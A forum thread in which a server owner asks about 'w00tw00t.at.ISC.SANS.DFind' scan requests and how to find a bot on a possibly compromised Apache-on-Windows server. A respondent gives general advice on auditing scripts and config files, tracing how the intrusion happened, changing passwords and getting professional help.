Google returns several thousand results when I search for w00tw00t.at.ISC.SANS.DFind.

Do any of those answer the question? I'd not heard of it before.

I have read visited many sites related to it and to summarise all I can find about it is:

"It's bots scanning for insecure scripts.
They sit there all day trying thousands of URL's agenst all the servers they can find, and when they find one they auto-hack it and send the spam."

Now, I guess some pirate could have installed a bot on my server. I don't know how but for a person to report my server, there is something wrong.

How can I detect which file is culprit for scanning other machines?

You need to go through all of the script files on your server, looking for any scripts you don't recognize.

To be clear, that means looking for anything on the server that is not a static file like an HTML page or an
image, etc.

Look at your server config files, and make sure there are no rewrites or Alias directives pointed to scripts you don't recognize.

If neither of these steps reveals anything, then you will need to edit each of your scripts, and look for code that you don't recognize.

Once you've found something, don't remove it immediately. Instead, you must figure out how it got changed -- You must find the 'hacking' mechanism that was used to compromise your server. Only after fixing that should you remove the actual hack. Some of these things 'phone home' and will replace themselves if you remove them but leave the server open to further hacking.

Best practice also indicates that you should also change all of your passwords immediately, and change them to passwords that are 'strong' -- Do a search on strong passwords for more information.

If your site revenue is important to your livelihood, then I'd suggest hiring a security professional to review your entire site unless you feel confident in doing it yourself -- This is a very serious and complex problem. You might contact your host and ask them if they can help you for a fee. Don't try to go cheap: You have a choice here of securing your server or going off-line.

Jim

oh dear... that sounds like a ginormous amount of checking. I am running apache on windows and currently running a process audit on the machine. I am hoping it will reveal the use of an illegal program at some point.

Is there an antivirus that can detect and destroy this thing?

Is it an .exe file that does this? or is it a web script? if it is a web script, it would mean it is in my web folder.

The malicious file could be named anything, and there could be more than one. By adding an AddHandler directive to your server configuration, *any* type of file can be made executable.

If this becomes an unsolvable problem, consider re-uploading your site and switching to "managed" hosting -- Then the problem belongs to the hosting company... :)

I have seen this request in my logs before, coming from compromised servers. I'd be very, very interested in what you find -- Filenames and any/all other information about the hack. As you've seen, there is little authoritative information on the Web, and/or it's hard to find. It would be good to know at least one of the filenames it uses, as a start to pinning down the cause.

Jim